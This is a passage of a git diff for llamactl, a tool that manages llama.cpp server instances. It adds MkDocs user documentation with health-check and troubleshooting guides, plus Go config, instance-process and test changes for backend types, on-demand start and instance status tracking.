Check llama-server [docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md) for more information.
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```
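For scripting, you can poll that endpoint until the instance reports healthy; a small sketch assuming `curl` and a POSIX shell:
```bash
# Wait up to ~60 seconds for an instance to become healthy
for _ in $(seq 1 60); do
  if curl -sf http://localhost:8080/api/instances/{name}/proxy/health > /dev/null; then
    echo "healthy"
    break
  fi
  sleep 1
done
```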

docs/user-guide/troubleshooting.md (new file, 160 lines)

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml-org/llama.cpp](https://github.com/ggml-org/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml-org/llama.cpp/issues](https://github.com/ggml-org/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml-org/llama.cpp/discussions](https://github.com/ggml-org/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
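Once a direct `llama-server` run works, the same parameters translate into llamactl `backend_options` (for example, the `--n-gpu-layers 35` flag maps to the `gpu_layers` key used elsewhere in these docs); a hedged sketch of the equivalent instance configuration:
```json
{
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/model.gguf",
    "gpu_layers": 35
  }
}
```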
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

mkdocs.yml (new file, 68 lines)

@@ -0,0 +1,68 @@
site_name: Llamactl Documentation
site_description: User documentation for Llamactl - A management tool for Llama.cpp instances
site_author: Llamactl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

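To preview this documentation locally, the standard MkDocs workflow applies; a minimal sketch (package names inferred from the theme and plugins configured above):
```bash
pip install mkdocs-material mkdocs-git-revision-date-localized-plugin
mkdocs serve  # serves the site at http://127.0.0.1:8000 by default
```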
pkg/backends/backend.go (new file, 7 lines)

@@ -0,0 +1,7 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
)


@@ -15,6 +15,9 @@ type AppConfig struct {
 	Server    ServerConfig    `yaml:"server"`
 	Instances InstancesConfig `yaml:"instances"`
 	Auth      AuthConfig      `yaml:"auth"`
+	Version    string `yaml:"-"`
+	CommitHash string `yaml:"-"`
+	BuildTime  string `yaml:"-"`
 }

 // ServerConfig contains HTTP server configuration
@@ -52,6 +55,12 @@ type InstancesConfig struct {
 	// Maximum number of instances that can be created
 	MaxInstances int `yaml:"max_instances"`

+	// Maximum number of instances that can be running at the same time
+	MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
+
+	// Enable LRU eviction for instance logs
+	EnableLRUEviction bool `yaml:"enable_lru_eviction"`
+
 	// Path to llama-server executable
 	LlamaExecutable string `yaml:"llama_executable"`

@@ -63,6 +72,15 @@ type InstancesConfig struct {
 	// Default restart delay for new instances (in seconds)
 	DefaultRestartDelay int `yaml:"default_restart_delay"`

+	// Default on-demand start setting for new instances
+	DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
+
+	// How long to wait for an instance to start on demand (in seconds)
+	OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
+
+	// Interval for checking instance timeouts (in minutes)
+	TimeoutCheckInterval int `yaml:"timeout_check_interval"`
 }

 // AuthConfig contains authentication settings
@@ -101,10 +119,15 @@ func LoadConfig(configPath string) (AppConfig, error) {
 			LogsDir:        filepath.Join(getDefaultDataDirectory(), "logs"),
 			AutoCreateDirs: true,
 			MaxInstances:   -1, // -1 means unlimited
+			MaxRunningInstances: -1, // -1 means unlimited
+			EnableLRUEviction:   true,
 			LlamaExecutable:     "llama-server",
 			DefaultAutoRestart:  true,
 			DefaultMaxRestarts:  3,
 			DefaultRestartDelay: 5,
+			DefaultOnDemandStart: true,
+			OnDemandStartTimeout: 120, // 2 minutes
+			TimeoutCheckInterval: 5,   // Check timeouts every 5 minutes
 		},
 		Auth: AuthConfig{
 			RequireInferenceAuth: true,
@@ -196,6 +219,16 @@ func loadEnvVars(cfg *AppConfig) {
 			cfg.Instances.MaxInstances = m
 		}
 	}
+	if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
+		if m, err := strconv.Atoi(maxRunning); err == nil {
+			cfg.Instances.MaxRunningInstances = m
+		}
+	}
+	if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
+		if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
+			cfg.Instances.EnableLRUEviction = b
+		}
+	}
 	if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
 		cfg.Instances.LlamaExecutable = llamaExec
 	}
@@ -214,6 +247,21 @@ func loadEnvVars(cfg *AppConfig) {
 			cfg.Instances.DefaultRestartDelay = seconds
 		}
 	}
+	if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
+		if b, err := strconv.ParseBool(onDemandStart); err == nil {
+			cfg.Instances.DefaultOnDemandStart = b
+		}
+	}
+	if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
+		if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
+			cfg.Instances.OnDemandStartTimeout = seconds
+		}
+	}
+	if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
+		if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
+			cfg.Instances.TimeoutCheckInterval = minutes
+		}
+	}
 	// Auth config
 	if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
 		if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {


@@ -5,7 +5,7 @@ import (
 	"encoding/json"
 	"fmt"
 	"io"
-	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/backends"
 	"llamactl/pkg/config"
 	"log"
 	"net/http"
@@ -13,46 +13,20 @@ import (
 	"net/url"
 	"os/exec"
 	"sync"
+	"sync/atomic"
 	"time"
 )

-type CreateInstanceOptions struct {
-	// Auto restart
-	AutoRestart *bool `json:"auto_restart,omitempty"`
-	MaxRestarts *int  `json:"max_restarts,omitempty"`
-	// RestartDelay duration in seconds
-	RestartDelay *int `json:"restart_delay_seconds,omitempty"`
-
-	llamacpp.LlamaServerOptions `json:",inline"`
+// TimeProvider interface allows for testing with mock time
+type TimeProvider interface {
+	Now() time.Time
 }

-// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
-// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
-// which can interfere with proper unmarshaling of the pointer fields
-func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
-	// First, unmarshal into a temporary struct without the embedded type
-	type tempCreateOptions struct {
-		AutoRestart  *bool `json:"auto_restart,omitempty"`
-		MaxRestarts  *int  `json:"max_restarts,omitempty"`
-		RestartDelay *int  `json:"restart_delay_seconds,omitempty"`
-	}
-
-	var temp tempCreateOptions
-	if err := json.Unmarshal(data, &temp); err != nil {
-		return err
-	}
-
-	// Copy the pointer fields
-	c.AutoRestart = temp.AutoRestart
-	c.MaxRestarts = temp.MaxRestarts
-	c.RestartDelay = temp.RestartDelay
-
-	// Now unmarshal the embedded LlamaServerOptions
-	if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
-		return err
-	}
-
-	return nil
+// realTimeProvider implements TimeProvider using the actual time
+type realTimeProvider struct{}
+
+func (realTimeProvider) Now() time.Time {
+	return time.Now()
 }

 // Process represents a running instance of the llama server
@@ -62,7 +36,8 @@ type Process struct {
 	globalSettings *config.InstancesConfig

 	// Status
-	Running bool `json:"running"`
+	Status         InstanceStatus `json:"status"`
+	onStatusChange func(oldStatus, newStatus InstanceStatus)

 	// Creation time
 	Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
@@ -83,85 +58,29 @@ type Process struct {
 	// Restart control
 	restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
 	monitorDone   chan struct{}      `json:"-"` // Channel to signal monitor goroutine completion
-}

-// validateAndCopyOptions validates and creates a deep copy of the provided options
-// It applies validation rules and returns a safe copy
-func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
-	optionsCopy := &CreateInstanceOptions{}
-
-	if options != nil {
-		// Copy the embedded LlamaServerOptions
-		optionsCopy.LlamaServerOptions = options.LlamaServerOptions
-
-		// Copy and validate pointer fields
-		if options.AutoRestart != nil {
-			autoRestart := *options.AutoRestart
-			optionsCopy.AutoRestart = &autoRestart
-		}
-
-		if options.MaxRestarts != nil {
-			maxRestarts := *options.MaxRestarts
-			if maxRestarts < 0 {
-				log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
-				maxRestarts = 0
-			}
-			optionsCopy.MaxRestarts = &maxRestarts
-		}
-
-		if options.RestartDelay != nil {
-			restartDelay := *options.RestartDelay
-			if restartDelay < 0 {
-				log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
-				restartDelay = 0
-			}
-			optionsCopy.RestartDelay = &restartDelay
-		}
-	}
-
-	return optionsCopy
-}
-
-// applyDefaultOptions applies default values from global settings to any nil options
-func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
-	if globalSettings == nil {
-		return
-	}
-
-	if options.AutoRestart == nil {
-		defaultAutoRestart := globalSettings.DefaultAutoRestart
-		options.AutoRestart = &defaultAutoRestart
-	}
-
-	if options.MaxRestarts == nil {
-		defaultMaxRestarts := globalSettings.DefaultMaxRestarts
-		options.MaxRestarts = &defaultMaxRestarts
-	}
-
-	if options.RestartDelay == nil {
-		defaultRestartDelay := globalSettings.DefaultRestartDelay
-		options.RestartDelay = &defaultRestartDelay
-	}
+	// Timeout management
+	lastRequestTime atomic.Int64 // Unix timestamp of last request
+	timeProvider    TimeProvider `json:"-"` // Time provider for testing
 }

 // NewInstance creates a new instance with the given name, log path, and options
-func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
+func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
 	// Validate and copy options
-	optionsCopy := validateAndCopyOptions(name, options)
-	// Apply defaults
-	applyDefaultOptions(optionsCopy, globalSettings)
+	options.ValidateAndApplyDefaults(name, globalSettings)

 	// Create the instance logger
 	logger := NewInstanceLogger(name, globalSettings.LogsDir)

 	return &Process{
 		Name:           name,
-		options:        optionsCopy,
+		options:        options,
 		globalSettings: globalSettings,
 		logger:         logger,
-		Running:        false,
+		timeProvider:   realTimeProvider{},
 		Created:        time.Now().Unix(),
+		Status:         Stopped,
+		onStatusChange: onStatusChange,
 	}
 }

@@ -171,6 +90,30 @@ func (i *Process) GetOptions() *CreateInstanceOptions {
 	return i.options
 }

+func (i *Process) GetPort() int {
+	i.mu.RLock()
+	defer i.mu.RUnlock()
+	if i.options != nil {
+		switch i.options.BackendType {
+		case backends.BackendTypeLlamaCpp:
+			return i.options.LlamaServerOptions.Port
+		}
+	}
+	return 0
+}
+
+func (i *Process) GetHost() string {
+	i.mu.RLock()
+	defer i.mu.RUnlock()
+	if i.options != nil {
+		switch i.options.BackendType {
+		case backends.BackendTypeLlamaCpp:
+			return i.options.LlamaServerOptions.Host
+		}
+	}
+	return ""
+}
+
 func (i *Process) SetOptions(options *CreateInstanceOptions) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
@@ -180,15 +123,19 @@ func (i *Process) SetOptions(options *CreateInstanceOptions) {
 		return
 	}

-	// Validate and copy options and apply defaults
-	optionsCopy := validateAndCopyOptions(i.Name, options)
-	applyDefaultOptions(optionsCopy, i.globalSettings)
+	// Validate and copy options
+	options.ValidateAndApplyDefaults(i.Name, i.globalSettings)

-	i.options = optionsCopy
+	i.options = options
 	// Clear the proxy so it gets recreated with new options
 	i.proxy = nil
 }

+// SetTimeProvider sets a custom time provider for testing
+func (i *Process) SetTimeProvider(tp TimeProvider) {
+	i.timeProvider = tp
+}
+
 // GetProxy returns the reverse proxy for this instance, creating it if needed
 func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
 	i.mu.Lock()
@@ -202,7 +149,15 @@ func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
 		return nil, fmt.Errorf("instance %s has no options set", i.Name)
 	}

-	targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
+	var host string
+	var port int
+	switch i.options.BackendType {
+	case backends.BackendTypeLlamaCpp:
+		host = i.options.LlamaServerOptions.Host
+		port = i.options.LlamaServerOptions.Port
+	}
+
+	targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
 	if err != nil {
 		return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
 	}
@@ -232,44 +187,36 @@ func (i *Process) MarshalJSON() ([]byte, error) {
 	i.mu.RLock()
 	defer i.mu.RUnlock()

-	// Create a temporary struct with exported fields for JSON marshalling
-	temp := struct {
-		Name    string                 `json:"name"`
-		Options *CreateInstanceOptions `json:"options,omitempty"`
-		Running bool                   `json:"running"`
-		Created int64                  `json:"created,omitempty"`
-	}{
-		Name:    i.Name,
-		Options: i.options,
-		Running: i.Running,
-		Created: i.Created,
-	}
-
-	return json.Marshal(temp)
+	// Use anonymous struct to avoid recursion
+	type Alias Process
+	return json.Marshal(&struct {
+		*Alias
+		Options *CreateInstanceOptions `json:"options,omitempty"`
+	}{
+		Alias:   (*Alias)(i),
+		Options: i.options,
+	})
 }

 // UnmarshalJSON implements json.Unmarshaler for Instance
 func (i *Process) UnmarshalJSON(data []byte) error {
-	// Create a temporary struct for unmarshalling
-	temp := struct {
-		Name    string                 `json:"name"`
-		Options *CreateInstanceOptions `json:"options,omitempty"`
-		Running bool                   `json:"running"`
-		Created int64                  `json:"created,omitempty"`
-	}{}
+	// Use anonymous struct to avoid recursion
+	type Alias Process
+	aux := &struct {
+		*Alias
+		Options *CreateInstanceOptions `json:"options,omitempty"`
+	}{
+		Alias: (*Alias)(i),
+	}

-	if err := json.Unmarshal(data, &temp); err != nil {
+	if err := json.Unmarshal(data, aux); err != nil {
 		return err
 	}

-	// Set the fields
-	i.Name = temp.Name
-	i.Running = temp.Running
-	i.Created = temp.Created
-
-	// Handle options with validation but no defaults
-	if temp.Options != nil {
-		i.options = validateAndCopyOptions(i.Name, temp.Options)
+	// Handle options with validation and defaults
+	if aux.Options != nil {
+		aux.Options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
+		i.options = aux.Options
 	}

 	return nil


@@ -2,6 +2,7 @@ package instance_test

 import (
 	"encoding/json"
+	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
@@ -18,28 +19,32 @@ func TestNewInstance(t *testing.T) {
 	}

 	options := &instance.CreateInstanceOptions{
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}

-	instance := instance.NewInstance("test-instance", globalSettings, options)
+	// Mock onStatusChange function
+	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}

-	if instance.Name != "test-instance" {
-		t.Errorf("Expected name 'test-instance', got %q", instance.Name)
+	inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
+
+	if inst.Name != "test-instance" {
+		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
 	}
-	if instance.Running {
+	if inst.IsRunning() {
 		t.Error("New instance should not be running")
 	}

 	// Check that options were properly set with defaults applied
-	opts := instance.GetOptions()
-	if opts.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
+	opts := inst.GetOptions()
+	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
 	}
-	if opts.Port != 8080 {
-		t.Errorf("Expected port 8080, got %d", opts.Port)
+	if inst.GetPort() != 8080 {
+		t.Errorf("Expected port 8080, got %d", inst.GetPort())
 	}

 	// Check that defaults were applied
@@ -71,12 +76,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
 		AutoRestart:  &autoRestart,
 		MaxRestarts:  &maxRestarts,
 		RestartDelay: &restartDelay,
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}

-	instance := instance.NewInstance("test-instance", globalSettings, options)
+	// Mock onStatusChange function
+	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+
+	instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
 	opts := instance.GetOptions()

 	// Check that explicit values override defaults
@@ -91,38 +100,6 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
 	}
 }

-func TestNewInstance_ValidationAndDefaults(t *testing.T) {
-	globalSettings := &config.InstancesConfig{
-		LogsDir:             "/tmp/test",
-		DefaultAutoRestart:  true,
-		DefaultMaxRestarts:  3,
-		DefaultRestartDelay: 5,
-	}
-
-	// Test with invalid negative values
-	invalidMaxRestarts := -5
-	invalidRestartDelay := -10
-
-	options := &instance.CreateInstanceOptions{
-		MaxRestarts:  &invalidMaxRestarts,
-		RestartDelay: &invalidRestartDelay,
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	instance := instance.NewInstance("test-instance", globalSettings, options)
-	opts := instance.GetOptions()
-
-	// Check that negative values were corrected to 0
-	if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
-		t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
-	}
-	if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
-		t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
-	}
-}
-
 func TestSetOptions(t *testing.T) {
 	globalSettings := &config.InstancesConfig{
 		LogsDir:             "/tmp/test",
@@ -132,17 +109,22 @@ func TestSetOptions(t *testing.T) {
 	}

 	initialOptions := &instance.CreateInstanceOptions{
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}

-	inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
+	// Mock onStatusChange function
+	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+
+	inst := instance.NewInstance("test-instance", globalSettings, initialOptions, mockOnStatusChange)

 	// Update options
 	newOptions := &instance.CreateInstanceOptions{
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
@@ -151,11 +133,11 @@ func TestSetOptions(t *testing.T) {
 	inst.SetOptions(newOptions)
 	opts := inst.GetOptions()

-	if opts.Model != "/path/to/new-model.gguf" {
-		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
+	if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
+		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
 	}
-	if opts.Port != 8081 {
-		t.Errorf("Expected updated port 8081, got %d", opts.Port)
+	if inst.GetPort() != 8081 {
+		t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
 	}

 	// Check that defaults are still applied
@@ -164,46 +146,23 @@ func TestSetOptions(t *testing.T) {
 	}
 }

-func TestSetOptions_NilOptions(t *testing.T) {
-	globalSettings := &config.InstancesConfig{
-		LogsDir:             "/tmp/test",
-		DefaultAutoRestart:  true,
-		DefaultMaxRestarts:  3,
-		DefaultRestartDelay: 5,
-	}
-
-	options := &instance.CreateInstanceOptions{
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	instance := instance.NewInstance("test-instance", globalSettings, options)
-	originalOptions := instance.GetOptions()
-
-	// Try to set nil options
-	instance.SetOptions(nil)
-
-	// Options should remain unchanged
-	currentOptions := instance.GetOptions()
-	if currentOptions.Model != originalOptions.Model {
-		t.Error("Options should not change when setting nil options")
-	}
-}
-
 func TestGetProxy(t *testing.T) {
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}

 	options := &instance.CreateInstanceOptions{
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Host: "localhost",
 			Port: 8080,
 		},
 	}

-	inst := instance.NewInstance("test-instance", globalSettings, options)
+	// Mock onStatusChange function
+	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+
+	inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)

 	// Get proxy for the first time
 	proxy1, err := inst.GetProxy()
@@ -233,13 +192,17 @@ func TestMarshalJSON(t *testing.T) {
 	}

 	options := &instance.CreateInstanceOptions{
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}

-	instance := instance.NewInstance("test-instance", globalSettings, options)
+	// Mock onStatusChange function
+	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+
+	instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)

 	data, err := json.Marshal(instance)
 	if err != nil {
@@ -247,7 +210,7 @@ func TestMarshalJSON(t *testing.T) {
 	}

 	// Check that JSON contains expected fields
-	var result map[string]interface{}
+	var result map[string]any
 	err = json.Unmarshal(data, &result)
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
@@ -256,8 +219,8 @@ func TestMarshalJSON(t *testing.T) {
 	if result["name"] != "test-instance" {
 		t.Errorf("Expected name 'test-instance', got %v", result["name"])
 	}
-	if result["running"] != false {
-		t.Errorf("Expected running false, got %v", result["running"])
+	if result["status"] != "stopped" {
+		t.Errorf("Expected status 'stopped', got %v", result["status"])
 	}

 	// Check that options are included
@@ -269,20 +232,41 @@ func TestMarshalJSON(t *testing.T) {
 	if !ok {
 		t.Error("Expected options to be a map")
 	}
-	if options_map["model"] != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
+
+	// Check backend type
+	if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
+		t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
+	}
+
+	// Check backend options
+	backend_options_data, ok := options_map["backend_options"]
+	if !ok {
+		t.Error("Expected backend_options to be included in JSON")
+	}
+	backend_options_map, ok := backend_options_data.(map[string]any)
+	if !ok {
+		t.Error("Expected backend_options to be a map")
+	}
+	if backend_options_map["model"] != "/path/to/model.gguf" {
+		t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
+	}
+	if backend_options_map["port"] != float64(8080) {
+		t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
 	}
 }

 func TestUnmarshalJSON(t *testing.T) {
 	jsonData := `{
 		"name": "test-instance",
-		"running": true,
+		"status": "running",
 		"options": {
-			"model": "/path/to/model.gguf",
-			"port": 8080,
 			"auto_restart": false,
-			"max_restarts": 5
+			"max_restarts": 5,
+			"backend_type": "llama_cpp",
+			"backend_options": {
+				"model": "/path/to/model.gguf",
+				"port": 8080
+			}
 		}
 	}`
@@ -295,19 +279,25 @@ func TestUnmarshalJSON(t *testing.T) {
 	if inst.Name != "test-instance" {
 		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
 	}
-	if !inst.Running {
-		t.Error("Expected running to be true")
+	if !inst.IsRunning() {
+		t.Error("Expected status to be running")
 	}

 	opts := inst.GetOptions()
 	if opts == nil {
 		t.Fatal("Expected options to be set")
 	}
-	if opts.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
+	if opts.BackendType != backends.BackendTypeLlamaCpp {
+		t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
 	}
-	if opts.Port != 8080 {
-		t.Errorf("Expected port 8080, got %d", opts.Port)
+	if opts.LlamaServerOptions == nil {
+		t.Fatal("Expected LlamaServerOptions to be set")
+	}
+	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
+	}
+	if inst.GetPort() != 8080 {
+		t.Errorf("Expected port 8080, got %d", inst.GetPort())
 	}
 	if opts.AutoRestart == nil || *opts.AutoRestart {
 		t.Error("Expected AutoRestart to be false")
@@ -317,58 +307,6 @@ func TestUnmarshalJSON(t *testing.T) {
 	}
 }

-func TestUnmarshalJSON_PartialOptions(t *testing.T) {
-	jsonData := `{
-		"name": "test-instance",
-		"running": false,
-		"options": {
-			"model": "/path/to/model.gguf"
-		}
-	}`
-
-	var inst instance.Process
-	err := json.Unmarshal([]byte(jsonData), &inst)
-	if err != nil {
-		t.Fatalf("JSON unmarshal failed: %v", err)
-	}
-
-	opts := inst.GetOptions()
-	if opts.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
-	}
-
-	// Note: Defaults are NOT applied during unmarshaling
-	// They should only be applied by NewInstance or SetOptions
-	if opts.AutoRestart != nil {
-		t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
-	}
-}
-
-func TestUnmarshalJSON_NoOptions(t *testing.T) {
-	jsonData := `{
-		"name": "test-instance",
-		"running": false
-	}`
-
-	var inst instance.Process
